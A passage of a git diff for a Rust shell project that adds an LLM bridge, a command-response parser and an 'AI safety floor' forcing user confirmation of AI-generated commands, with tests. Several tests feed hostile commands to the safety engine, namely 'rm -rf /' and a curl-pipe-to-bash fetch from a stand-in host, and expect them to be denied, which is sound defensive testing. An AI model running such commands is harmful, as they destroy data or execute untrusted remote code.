[`translate_nl`]. + pub async fn assist_on_127(&self, failed_argv: &[&str]) -> Result { + let snap = self.context_provider.snapshot(); + let req = self.composer.compose_assist_on_127(failed_argv, &snap)?; + let resp = self.client.complete(req).await?; + let argv = parse_command_response(&resp.text)?; + Ok(ProposedCommand::new( + argv, + CommandSource::AiGenerated, + resp.text, + )) + } +} + +// ── Tests ───────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + use crate::client::{LlmResponse, MockLlmClient}; + use logicshell_core::config::LlmConfig; + + fn mock_client_returning(text: &str) -> Arc { + let mut mock = MockLlmClient::new(); + let text = text.to_string(); + mock.expect_complete().returning(move |req| { + Ok(LlmResponse { + text: text.clone(), + model: req.model, + }) + }); + Arc::new(mock) + } + + fn error_client(err: LlmError) -> Arc { + let mut mock = MockLlmClient::new(); + // LlmError is Clone-able via the explicit impl in error module tests + let msg = err.to_string(); + mock.expect_complete() + .returning(move |_| Err(LlmError::Http(msg.clone()))); + Arc::new(mock) + } + + // ── LlmBridge::new ──────────────────────────────────────────────────────── + + #[test] + fn new_stores_model() { + let client = mock_client_returning("ls"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + assert_eq!(bridge.model(), "llama3"); + } + + #[test] + fn new_with_zero_cap_stores_model() { + let client = mock_client_returning("ls"); + let bridge = LlmBridge::new(client, "m", 0); + assert_eq!(bridge.model(), "m"); + } + + // ── LlmBridge::from_config ──────────────────────────────────────────────── + + #[test] + fn from_config_disabled_returns_error() { + let client = mock_client_returning("ls"); + let cfg = LlmConfig { + enabled: false, + ..LlmConfig::default() + }; + let result = LlmBridge::from_config(client, &cfg); + assert_eq!(result.unwrap_err(), LlmError::Disabled); + } + + #[test] + fn from_config_enabled_no_model_returns_error() { + let client = mock_client_returning("ls"); + let cfg = LlmConfig { + enabled: true, + model: None, + ..LlmConfig::default() + }; + let result = LlmBridge::from_config(client, &cfg); + assert_eq!(result.unwrap_err(), LlmError::ModelNotSpecified); + } + + #[test] + fn from_config_valid_stores_model() { + let client = mock_client_returning("ls"); + let cfg = LlmConfig { + enabled: true, + model: Some("mistral".into()), + ..LlmConfig::default() + }; + let bridge = LlmBridge::from_config(client, &cfg).unwrap(); + assert_eq!(bridge.model(), "mistral"); + } + + // ── translate_nl ────────────────────────────────────────────────────────── + + #[tokio::test] + async fn translate_nl_returns_proposed_command() { + let client = mock_client_returning("ls -la"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("list files").await.unwrap(); + assert_eq!(proposed.argv, vec!["ls", "-la"]); + } + + #[tokio::test] + async fn translate_nl_source_is_ai_generated() { + let client = mock_client_returning("pwd"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge + .translate_nl("print working directory") + .await + .unwrap(); + assert_eq!(proposed.source, CommandSource::AiGenerated); + } + + #[tokio::test] + async fn translate_nl_raw_response_preserved() { + let client = mock_client_returning("ls -lhS"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("list files by size").await.unwrap(); + assert_eq!(proposed.raw_response, "ls -lhS"); + } + + #[tokio::test] + async fn translate_nl_strips_code_fence_in_response() { + let client = mock_client_returning("```bash\nls -la\n```"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("list files").await.unwrap(); + assert_eq!(proposed.argv, vec!["ls", "-la"]); + } + + #[tokio::test] + async fn translate_nl_context_too_large_propagated() { + let client = mock_client_returning("ls"); + let bridge = LlmBridge::new(client, "m", 10); // cap too small + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::ContextTooLarge { .. }))); + } + + #[tokio::test] + async fn translate_nl_http_error_propagated_for_degradation() { + let client = error_client(LlmError::Http("connection refused".into())); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::Http(_)))); + } + + #[tokio::test] + async fn translate_nl_parse_error_on_empty_response() { + let client = mock_client_returning(""); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::Parse(_)))); + } + + #[tokio::test] + async fn translate_nl_git_command() { + let client = mock_client_returning("git log --oneline -10"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("show last 10 commits").await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "log", "--oneline", "-10"]); + } + + // ── assist_on_127 ───────────────────────────────────────────────────────── + + #[tokio::test] + async fn assist_on_127_returns_proposed_command() { + let client = mock_client_returning("git status"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&["gti", "status"]).await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "status"]); + } + + #[tokio::test] + async fn assist_on_127_source_is_ai_generated() { + let client = mock_client_returning("git status"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&["gti", "status"]).await.unwrap(); + assert_eq!(proposed.source, CommandSource::AiGenerated); + } + + #[tokio::test] + async fn assist_on_127_raw_response_preserved() { + let client = mock_client_returning("docker ps"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&["docekr", "ps"]).await.unwrap(); + assert_eq!(proposed.raw_response, "docker ps"); + } + + #[tokio::test] + async fn assist_on_127_empty_argv_works() { + let client = mock_client_returning("ls"); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&[]).await.unwrap(); + assert!(!proposed.argv.is_empty()); + } + + #[tokio::test] + async fn assist_on_127_http_error_propagated() { + let client = error_client(LlmError::Http("timeout".into())); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.assist_on_127(&["gti", "status"]).await; + assert!(matches!(result, Err(LlmError::Http(_)))); + } + + #[tokio::test] + async fn assist_on_127_context_too_large_propagated() { + let client = mock_client_returning("git status"); + let bridge = LlmBridge::new(client, "m", 10); // tiny cap + let result = bridge.assist_on_127(&["gti"]).await; + assert!(matches!(result, Err(LlmError::ContextTooLarge { .. }))); + } + + #[tokio::test] + async fn assist_on_127_parse_error_on_empty_response() { + let client = mock_client_returning(" "); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.assist_on_127(&["cmd"]).await; + assert!(matches!(result, Err(LlmError::Parse(_)))); + } +} diff --git a/logicshell-llm/src/lib.rs b/logicshell-llm/src/lib.rs index 4cc2b88..19bf489 100644 --- a/logicshell-llm/src/lib.rs +++ b/logicshell-llm/src/lib.rs @@ -1,15 +1,20 @@ // logicshell-llm: LLM bridge, context, composer, Ollama client // Enable HTTP backend with the `ollama` feature flag. +pub mod bridge; pub mod client; pub mod context; pub mod error; +pub mod parser; pub mod prompt; +pub mod proposed; #[cfg(feature = "ollama")] pub mod ollama; +pub use bridge::LlmBridge; pub use client::{LlmClient, LlmRequest, LlmResponse}; pub use context::{SystemContextProvider, SystemContextSnapshot}; pub use error::LlmError; pub use prompt::PromptComposer; +pub use proposed::{apply_ai_safety_floor, CommandSource, ProposedCommand}; diff --git a/logicshell-llm/src/parser.rs b/logicshell-llm/src/parser.rs new file mode 100644 index 0000000..3cee726 --- /dev/null +++ b/logicshell-llm/src/parser.rs @@ -0,0 +1,360 @@ +// Command response parser — Phase 10, LLM Module PRD §5.5 +// +// Converts raw LLM response text into an argv vec suitable for dispatch. +// The pipeline: +// 1. Strip optional markdown code fence (```bash...``` or ```...```) +// 2. Take the first non-empty line (models sometimes emit preamble) +// 3. Shell-tokenize: whitespace, single-quotes (literal), double-quotes +// (backslash-escaped), backslash escapes outside quotes. +// +// Returns `LlmError::Parse` on empty/whitespace-only responses and on +// unterminated quoted strings. + +use crate::error::LlmError; + +/// Parse a raw LLM response into an argv vector. +/// +/// Strips code fences, takes the first non-empty line, and tokenizes it +/// using POSIX-style shell quoting rules (single-quotes, double-quotes, +/// backslash escapes). +/// +/// # Errors +/// +/// - `LlmError::Parse` when the response is empty after stripping. +/// - `LlmError::Parse` when the response contains an unterminated quote. +pub fn parse_command_response(text: &str) -> Result, LlmError> { + let stripped = strip_code_fence(text); + + let first_line = stripped + .lines() + .map(str::trim) + .find(|l| !l.is_empty()) + .unwrap_or(""); + + if first_line.is_empty() { + return Err(LlmError::Parse( + "LLM response contained no parseable command".into(), + )); + } + + tokenize(first_line) +} + +/// Strip a leading ```` ``` ```` (with optional language tag) and trailing +/// ```` ``` ```` from `text`. Returns a trimmed `&str` slice of the interior +/// content. If no fence is found the input is returned trimmed. +fn strip_code_fence(text: &str) -> &str { + let trimmed = text.trim(); + if let Some(rest) = trimmed.strip_prefix("```") { + // Skip an optional language tag that runs to the first newline. + let after_tag = if let Some(nl) = rest.find('\n') { + &rest[nl + 1..] + } else { + rest + }; + // Strip the trailing ``` if present. + if let Some(end) = after_tag.rfind("```") { + return after_tag[..end].trim(); + } + // Malformed fence: return the raw interior anyway. + return after_tag.trim(); + } + trimmed +} + +/// POSIX-style shell tokenizer for a single command line. +/// +/// Supported: +/// - Unquoted tokens split on ASCII whitespace +/// - `'...'` single-quotes — literal content, no escaping inside +/// - `"..."` double-quotes — backslash-escape inside (`\\`, `\"`, `\n`, etc.) +/// - `\x` outside quotes — the character `x` is taken literally +/// +/// Returns `Err(())` on unterminated quotes; callers map this to `LlmError::Parse`. +fn tokenize(s: &str) -> Result, LlmError> { + let mut tokens: Vec = Vec::new(); + let mut current = String::new(); + let mut in_token = false; + let mut chars = s.chars().peekable(); + + while let Some(c) = chars.next() { + match c { + ' ' | '\t' => { + if in_token { + tokens.push(current.clone()); + current.clear(); + in_token = false; + } + } + '\'' => { + in_token = true; + loop { + match chars.next() { + Some('\'') => break, + Some(ch) => current.push(ch), + None => { + return Err(LlmError::Parse( + "unterminated single-quote in LLM response".into(), + )) + } + } + } + } + '"' => { + in_token = true; + loop { + match chars.next() { + Some('"') => break, + Some('\\') => match chars.next() { + Some(escaped) => current.push(escaped), + None => { + return Err(LlmError::Parse( + "unterminated escape in double-quoted string".into(), + )) + } + }, + Some(ch) => current.push(ch), + None => { + return Err(LlmError::Parse( + "unterminated double-quote in LLM response".into(), + )) + } + } + } + } + '\\' => { + in_token = true; + if let Some(escaped) = chars.next() { + current.push(escaped); + } + } + _ => { + in_token = true; + current.push(c); + } + } + } + + if in_token { + tokens.push(current); + } + + if tokens.is_empty() { + return Err(LlmError::Parse( + "LLM response tokenized to empty argv".into(), + )); + } + + Ok(tokens) +} + +// ── Tests ───────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + + // ── strip_code_fence ────────────────────────────────────────────────────── + + #[test] + fn strip_fence_no_fence_returns_trimmed() { + assert_eq!(strip_code_fence("ls -la"), "ls -la"); + } + + #[test] + fn strip_fence_with_bash_tag() { + let input = "```bash\nls -la\n```"; + assert_eq!(strip_code_fence(input), "ls -la"); + } + + #[test] + fn strip_fence_without_language_tag() { + let input = "```\nls -la\n```"; + assert_eq!(strip_code_fence(input), "ls -la"); + } + + #[test] + fn strip_fence_multiline_takes_interior() { + let input = "```bash\nls -la\necho done\n```"; + let result = strip_code_fence(input); + assert!(result.contains("ls -la")); + assert!(result.contains("echo done")); + } + + #[test] + fn strip_fence_trims_surrounding_whitespace() { + assert_eq!(strip_code_fence(" ls -la "), "ls -la"); + } + + #[test] + fn strip_fence_empty_string() { + assert_eq!(strip_code_fence(""), ""); + } + + #[test] + fn strip_fence_only_whitespace() { + assert_eq!(strip_code_fence(" "), ""); + } + + // ── tokenize ────────────────────────────────────────────────────────────── + + #[test] + fn tokenize_simple_command() { + assert_eq!(tokenize("ls").unwrap(), vec!["ls"]); + } + + #[test] + fn tokenize_command_with_args() { + assert_eq!(tokenize("ls -la").unwrap(), vec!["ls", "-la"]); + } + + #[test] + fn tokenize_multiple_spaces_collapsed() { + assert_eq!(tokenize("ls -la").unwrap(), vec!["ls", "-la"]); + } + + #[test] + fn tokenize_single_quoted_space() { + assert_eq!( + tokenize("echo 'hello world'").unwrap(), + vec!["echo", "hello world"] + ); + } + + #[test] + fn tokenize_double_quoted_space() { + assert_eq!( + tokenize(r#"echo "hello world""#).unwrap(), + vec!["echo", "hello world"] + ); + } + + #[test] + fn tokenize_double_quote_with_backslash_escape() { + assert_eq!( + tokenize(r#"echo "hello \"world\"""#).unwrap(), + vec!["echo", r#"hello "world""#] + ); + } + + #[test] + fn tokenize_backslash_space() { + assert_eq!( + tokenize(r#"echo hello\ world"#).unwrap(), + vec!["echo", "hello world"] + ); + } + + #[test] + fn tokenize_tab_as_separator() { + assert_eq!(tokenize("ls\t-la").unwrap(), vec!["ls", "-la"]); + } + + #[test] + fn tokenize_unterminated_single_quote_is_error() { + assert!(tokenize("echo 'hello").is_err()); + } + + #[test] + fn tokenize_unterminated_double_quote_is_error() { + assert!(tokenize(r#"echo "hello"#).is_err()); + } + + #[test] + fn tokenize_empty_string_is_error() { + assert!(tokenize("").is_err()); + } + + #[test] + fn tokenize_whitespace_only_is_error() { + assert!(tokenize(" ").is_err()); + } + + #[test] + fn tokenize_cmd_with_flags_and_path() { + assert_eq!( + tokenize("find /tmp -name '*.log' -type f").unwrap(), + vec!["find", "/tmp", "-name", "*.log", "-type", "f"] + ); + } + + #[test] + fn tokenize_git_commit_with_message() { + assert_eq!( + tokenize(r#"git commit -m "fix: typo""#).unwrap(), + vec!["git", "commit", "-m", "fix: typo"] + ); + } + + // ── parse_command_response ──────────────────────────────────────────────── + + #[test] + fn parse_simple_command() { + let result = parse_command_response("ls -la").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } + + #[test] + fn parse_takes_first_non_empty_line() { + let result = parse_command_response("\nls -la\necho done\n").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } + + #[test] + fn parse_strips_bash_fence() { + let result = parse_command_response("```bash\nls -la\n```").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } + + #[test] + fn parse_strips_plain_fence() { + let result = parse_command_response("```\nls -la\n```").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } + + #[test] + fn parse_empty_response_is_error() { + assert!(parse_command_response("").is_err()); + } + + #[test] + fn parse_whitespace_only_is_error() { + assert!(parse_command_response(" \n\n ").is_err()); + } + + #[test] + fn parse_error_is_parse_variant() { + let e = parse_command_response("").unwrap_err(); + assert!(matches!(e, LlmError::Parse(_))); + } + + #[test] + fn parse_unterminated_quote_is_parse_error() { + let e = parse_command_response("echo 'hello").unwrap_err(); + assert!(matches!(e, LlmError::Parse(_))); + } + + #[test] + fn parse_command_with_quoted_args() { + let result = parse_command_response(r#"grep -r "TODO" src/"#).unwrap(); + assert_eq!(result, vec!["grep", "-r", "TODO", "src/"]); + } + + #[test] + fn parse_git_log_command() { + let result = parse_command_response("git log --oneline -10").unwrap(); + assert_eq!(result, vec!["git", "log", "--oneline", "-10"]); + } + + #[test] + fn parse_single_word_command() { + let result = parse_command_response("pwd").unwrap(); + assert_eq!(result, vec!["pwd"]); + } + + #[test] + fn parse_trims_leading_trailing_whitespace() { + let result = parse_command_response(" ls -la ").unwrap(); + assert_eq!(result, vec!["ls", "-la"]); + } +} diff --git a/logicshell-llm/src/proposed.rs b/logicshell-llm/src/proposed.rs new file mode 100644 index 0000000..9f85a2a --- /dev/null +++ b/logicshell-llm/src/proposed.rs @@ -0,0 +1,220 @@ +// ProposedCommand + CommandSource — Phase 10, LLM Module PRD §5.6 +// +// A `ProposedCommand` wraps an argv produced by the LLM bridge and records +// its provenance. `CommandSource::AiGenerated` triggers a safety-floor raise: +// the safety engine's `Allow` decision is promoted to `Confirm` so AI-produced +// commands always require explicit user confirmation before dispatch. + +use logicshell_core::config::{SafetyConfig, SafetyMode}; +use logicshell_core::{Decision, RiskAssessment, SafetyPolicyEngine}; + +/// Provenance of a command proposed for dispatch. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum CommandSource { + /// Command was produced by an AI language model. + AiGenerated, +} + +/// A command candidate produced by the LLM bridge, ready for safety evaluation +/// and user confirmation before dispatch. +#[derive(Debug, Clone, PartialEq)] +pub struct ProposedCommand { + /// Tokenized argument vector suitable for dispatch. + pub argv: Vec, + /// How this command was produced. + pub source: CommandSource, + /// Raw text returned by the model (for display / audit). + pub raw_response: String, +} + +impl ProposedCommand { + /// Construct a new `ProposedCommand`. + pub fn new(argv: Vec, source: CommandSource, raw_response: impl Into) -> Self { + Self { + argv, + source, + raw_response: raw_response.into(), + } + } + + /// Evaluate this command through the safety policy engine, then apply the + /// AI safety floor: `Allow` is raised to `Confirm` for `AiGenerated` commands + /// so that human confirmation is always required before executing AI output. + /// + /// `Confirm` and `Deny` decisions are returned unchanged. + pub fn evaluate_safety( + &self, + safety_mode: SafetyMode, + safety_config: &SafetyConfig, + ) -> (RiskAssessment, Decision) { + let engine = SafetyPolicyEngine::new(safety_mode, safety_config); + let refs: Vec<&str> = self.argv.iter().map(|s| s.as_str()).collect(); + let (assessment, decision) = engine.evaluate(&refs); + let final_decision = apply_ai_safety_floor(decision, &self.source); + (assessment, final_decision) + } +} + +/// Raise a safety `Decision` to the minimum appropriate for AI-generated output. +/// +/// AI-generated commands receive a raised floor: `Allow` → `Confirm`. +/// `Confirm` and `Deny` are unaffected. Non-AI sources are unaffected. +pub fn apply_ai_safety_floor(decision: Decision, source: &CommandSource) -> Decision { + match source { + CommandSource::AiGenerated => match decision { + Decision::Allow => Decision::Confirm, + d => d, + }, + } +} + +// ── Tests ───────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + use logicshell_core::config::SafetyConfig; + + // ── CommandSource ───────────────────────────────────────────────────────── + + #[test] + fn command_source_debug() { + assert!(format!("{:?}", CommandSource::AiGenerated).contains("AiGenerated")); + } + + #[test] + fn command_source_clone_eq() { + let a = CommandSource::AiGenerated; + assert_eq!(a.clone(), CommandSource::AiGenerated); + } + + // ── ProposedCommand::new ────────────────────────────────────────────────── + + #[test] + fn new_stores_fields() { + let p = ProposedCommand::new( + vec!["ls".into(), "-la".into()], + CommandSource::AiGenerated, + "ls -la", + ); + assert_eq!(p.argv, vec!["ls", "-la"]); + assert_eq!(p.source, CommandSource::AiGenerated); + assert_eq!(p.raw_response, "ls -la"); + } + + #[test] + fn new_empty_argv() { + let p = ProposedCommand::new(vec![], CommandSource::AiGenerated, ""); + assert!(p.argv.is_empty()); + } + + #[test] + fn proposed_command_clone_eq() { + let p = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + assert_eq!(p.clone(), p); + } + + #[test] + fn proposed_command_partial_eq() { + let a = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + let b = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + let c = ProposedCommand::new(vec!["pwd".into()], CommandSource::AiGenerated, "pwd"); + assert_eq!(a, b); + assert_ne!(a, c); + } + + #[test] + fn proposed_command_debug() { + let p = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + assert!(format!("{p:?}").contains("ProposedCommand")); + } + + // ── apply_ai_safety_floor ───────────────────────────────────────────────── + + #[test] + fn floor_raises_allow_to_confirm() { + let result = apply_ai_safety_floor(Decision::Allow, &CommandSource::AiGenerated); + assert_eq!(result, Decision::Confirm); + } + + #[test] + fn floor_confirm_unchanged() { + let result = apply_ai_safety_floor(Decision::Confirm, &CommandSource::AiGenerated); + assert_eq!(result, Decision::Confirm); + } + + #[test] + fn floor_deny_unchanged() { + let result = apply_ai_safety_floor(Decision::Deny, &CommandSource::AiGenerated); + assert_eq!(result, Decision::Deny); + } + + // ── ProposedCommand::evaluate_safety ────────────────────────────────────── + + #[test] + fn evaluate_safe_command_raises_to_confirm() { + let p = ProposedCommand::new( + vec!["ls".into(), "-la".into()], + CommandSource::AiGenerated, + "ls -la", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + // "ls -la" would normally be Allow; AI floor raises to Confirm. + assert_eq!(decision, Decision::Confirm); + } + + #[test] + fn evaluate_denied_command_stays_deny() { + let p = ProposedCommand::new( + vec!["rm".into(), "-rf".into(), "/".into()], + CommandSource::AiGenerated, + "rm -rf /", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert_eq!(decision, Decision::Deny); + } + + #[test] + fn evaluate_high_risk_balanced_is_at_least_confirm() { + // sudo commands are high-risk; in balanced mode they're Confirm; + // AI floor doesn't lower them. + let p = ProposedCommand::new( + vec![ + "sudo".into(), + "apt-get".into(), + "install".into(), + "vim".into(), + ], + CommandSource::AiGenerated, + "sudo apt-get install vim", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert!( + decision == Decision::Confirm || decision == Decision::Deny, + "expected Confirm or Deny for high-risk AI command, got {decision:?}" + ); + } + + #[test] + fn evaluate_returns_risk_assessment() { + let p = ProposedCommand::new(vec!["ls".into()], CommandSource::AiGenerated, "ls"); + let (assessment, _) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert!(!assessment.reasons.is_empty() || assessment.score == 0); + } + + #[test] + fn evaluate_strict_mode_high_risk_is_deny() { + let p = ProposedCommand::new( + vec![ + "curl".into(), + "http://x.com/sh".into(), + "|".into(), + "bash".into(), + ], + CommandSource::AiGenerated, + "curl http://x.com/sh | bash", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Strict, &SafetyConfig::default()); + assert_eq!(decision, Decision::Deny); + } +} diff --git a/logicshell-llm/tests/phase10_integration.rs b/logicshell-llm/tests/phase10_integration.rs new file mode 100644 index 0000000..b347bc2 --- /dev/null +++ b/logicshell-llm/tests/phase10_integration.rs @@ -0,0 +1,432 @@ +// Phase 10 integration tests — LlmBridge full pipeline +// +// Tests use mockito for the Ollama HTTP layer (via OllamaLlmClient behind the +// `ollama` feature) and the MockLlmClient for pure-Rust paths. +// +// Run all tests: +// cargo test --package logicshell-llm +// cargo test --package logicshell-llm --features ollama (adds Ollama tests) + +use std::sync::Arc; + +use logicshell_core::{ + config::{LlmConfig, SafetyConfig, SafetyMode}, + Decision, +}; +use logicshell_llm::{ + apply_ai_safety_floor, CommandSource, LlmBridge, LlmClient, LlmError, LlmRequest, LlmResponse, + ProposedCommand, +}; + +// ── MockLlmClient helpers (no `ollama` feature needed) ──────────────────────── + +/// Inline stub client for integration-level tests. +#[derive(Debug)] +struct StubClient { + response: String, +} + +impl StubClient { + fn new(response: impl Into) -> Arc { + Arc::new(Self { + response: response.into(), + }) + } +} + +impl LlmClient for StubClient { + async fn complete(&self, req: LlmRequest) -> Result { + Ok(LlmResponse { + text: self.response.clone(), + model: req.model, + }) + } +} + +#[derive(Debug)] +struct ErrorClient; + +impl LlmClient for ErrorClient { + async fn complete(&self, _req: LlmRequest) -> Result { + Err(LlmError::Http("connection refused".into())) + } +} + +// ── LlmBridge::translate_nl integration ────────────────────────────────────── + +#[tokio::test] +async fn translate_nl_returns_ai_generated_source() { + let bridge = LlmBridge::new(StubClient::new("ls -la"), "llama3", 8_000); + let proposed = bridge.translate_nl("list files").await.unwrap(); + assert_eq!(proposed.source, CommandSource::AiGenerated); +} + +#[tokio::test] +async fn translate_nl_full_pipeline_argv_parsed() { + let bridge = LlmBridge::new(StubClient::new("git log --oneline -20"), "llama3", 8_000); + let proposed = bridge.translate_nl("show recent commits").await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "log", "--oneline", "-20"]); +} + +#[tokio::test] +async fn translate_nl_raw_response_available_for_audit() { + let bridge = LlmBridge::new(StubClient::new("find . -name '*.rs'"), "llama3", 8_000); + let proposed = bridge.translate_nl("find all rust files").await.unwrap(); + assert_eq!(proposed.raw_response, "find . -name '*.rs'"); +} + +#[tokio::test] +async fn translate_nl_code_fence_stripped() { + let bridge = LlmBridge::new(StubClient::new("```bash\nls -lhS\n```"), "llama3", 8_000); + let proposed = bridge.translate_nl("list files by size").await.unwrap(); + assert_eq!(proposed.argv[0], "ls"); + assert!(proposed.argv.contains(&"-lhS".to_string())); +} + +#[tokio::test] +async fn translate_nl_graceful_degradation_on_http_error() { + let bridge = LlmBridge::new(Arc::new(ErrorClient), "llama3", 8_000); + let result = bridge.translate_nl("list files").await; + assert!( + matches!(result, Err(LlmError::Http(_))), + "unreachable daemon must return Http error for graceful degradation" + ); +} + +#[tokio::test] +async fn translate_nl_context_too_large_propagated() { + let bridge = LlmBridge::new(StubClient::new("ls"), "m", 5); + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::ContextTooLarge { .. }))); +} + +#[tokio::test] +async fn translate_nl_empty_response_parse_error() { + let bridge = LlmBridge::new(StubClient::new(""), "llama3", 8_000); + let result = bridge.translate_nl("do something").await; + assert!(matches!(result, Err(LlmError::Parse(_)))); +} + +// ── LlmBridge::assist_on_127 integration ──────────────────────────────────── + +#[tokio::test] +async fn assist_on_127_suggests_corrected_command() { + let bridge = LlmBridge::new(StubClient::new("git status"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&["gti", "status"]).await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "status"]); +} + +#[tokio::test] +async fn assist_on_127_source_is_ai_generated() { + let bridge = LlmBridge::new(StubClient::new("docker ps"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&["docekr", "ps"]).await.unwrap(); + assert_eq!(proposed.source, CommandSource::AiGenerated); +} + +#[tokio::test] +async fn assist_on_127_graceful_degradation_on_http_error() { + let bridge = LlmBridge::new(Arc::new(ErrorClient), "llama3", 8_000); + let result = bridge.assist_on_127(&["gti", "status"]).await; + assert!( + matches!(result, Err(LlmError::Http(_))), + "HTTP error must be propagated for caller to fall back" + ); +} + +#[tokio::test] +async fn assist_on_127_single_word_typo() { + let bridge = LlmBridge::new(StubClient::new("cargo"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&["crago"]).await.unwrap(); + assert_eq!(proposed.argv, vec!["cargo"]); +} + +#[tokio::test] +async fn assist_on_127_empty_failed_argv_still_returns_proposal() { + let bridge = LlmBridge::new(StubClient::new("ls"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&[]).await.unwrap(); + assert!(!proposed.argv.is_empty()); +} + +// ── from_config integration ─────────────────────────────────────────────────── + +#[test] +fn bridge_from_config_disabled_is_error() { + let cfg = LlmConfig { + enabled: false, + ..LlmConfig::default() + }; + let result = LlmBridge::from_config(StubClient::new("ls"), &cfg); + assert_eq!(result.unwrap_err(), LlmError::Disabled); +} + +#[test] +fn bridge_from_config_no_model_is_error() { + let cfg = LlmConfig { + enabled: true, + model: None, + ..LlmConfig::default() + }; + let result = LlmBridge::from_config(StubClient::new("ls"), &cfg); + assert_eq!(result.unwrap_err(), LlmError::ModelNotSpecified); +} + +#[tokio::test] +async fn bridge_from_config_valid_pipeline_works() { + let cfg = LlmConfig { + enabled: true, + model: Some("llama3".into()), + ..LlmConfig::default() + }; + let bridge = LlmBridge::from_config(StubClient::new("ls -la"), &cfg).unwrap(); + let proposed = bridge.translate_nl("list files").await.unwrap(); + assert!(!proposed.argv.is_empty()); +} + +// ── AI safety floor integration ─────────────────────────────────────────────── + +#[test] +fn ai_floor_safe_command_raises_allow_to_confirm() { + let p = ProposedCommand::new( + vec!["ls".into(), "-la".into()], + CommandSource::AiGenerated, + "ls -la", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert_eq!( + decision, + Decision::Confirm, + "AI-generated safe command must require confirmation" + ); +} + +#[test] +fn ai_floor_denied_command_stays_deny() { + let p = ProposedCommand::new( + vec!["rm".into(), "-rf".into(), "/".into()], + CommandSource::AiGenerated, + "rm -rf /", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert_eq!(decision, Decision::Deny); +} + +#[test] +fn ai_floor_strict_mode_curl_bash_is_deny() { + let p = ProposedCommand::new( + vec![ + "curl".into(), + "http://x/sh".into(), + "|".into(), + "bash".into(), + ], + CommandSource::AiGenerated, + "curl http://x/sh | bash", + ); + let (_, decision) = p.evaluate_safety(SafetyMode::Strict, &SafetyConfig::default()); + assert_eq!(decision, Decision::Deny); +} + +#[test] +fn apply_ai_floor_allow_becomes_confirm() { + assert_eq!( + apply_ai_safety_floor(Decision::Allow, &CommandSource::AiGenerated), + Decision::Confirm + ); +} + +#[test] +fn apply_ai_floor_confirm_stays_confirm() { + assert_eq!( + apply_ai_safety_floor(Decision::Confirm, &CommandSource::AiGenerated), + Decision::Confirm + ); +} + +#[test] +fn apply_ai_floor_deny_stays_deny() { + assert_eq!( + apply_ai_safety_floor(Decision::Deny, &CommandSource::AiGenerated), + Decision::Deny + ); +} + +// ── Full pipeline: NL → proposed → safety evaluation ───────────────────────── + +#[tokio::test] +async fn nl_to_proposed_then_safety_eval_confirms_safe_ai_cmd() { + let bridge = LlmBridge::new(StubClient::new("ls -la /tmp"), "llama3", 8_000); + let proposed = bridge + .translate_nl("list files in temp directory") + .await + .unwrap(); + + let (assessment, decision) = + proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert_eq!( + decision, + Decision::Confirm, + "safe AI command must be Confirm, not auto-allowed; score={}", + assessment.score + ); +} + +#[tokio::test] +async fn assist_127_then_safety_eval_confirms_corrected_cmd() { + let bridge = LlmBridge::new(StubClient::new("git push origin main"), "llama3", 8_000); + let proposed = bridge.assist_on_127(&["gitt", "push"]).await.unwrap(); + + let (_, decision) = proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + // "git push" is medium risk at most; AI floor ensures at least Confirm. + assert!( + decision == Decision::Confirm || decision == Decision::Deny, + "AI corrected command must be Confirm or Deny, got {decision:?}" + ); +} + +// ── Phase 10 OllamaLlmClient integration (requires `ollama` feature) ───────── + 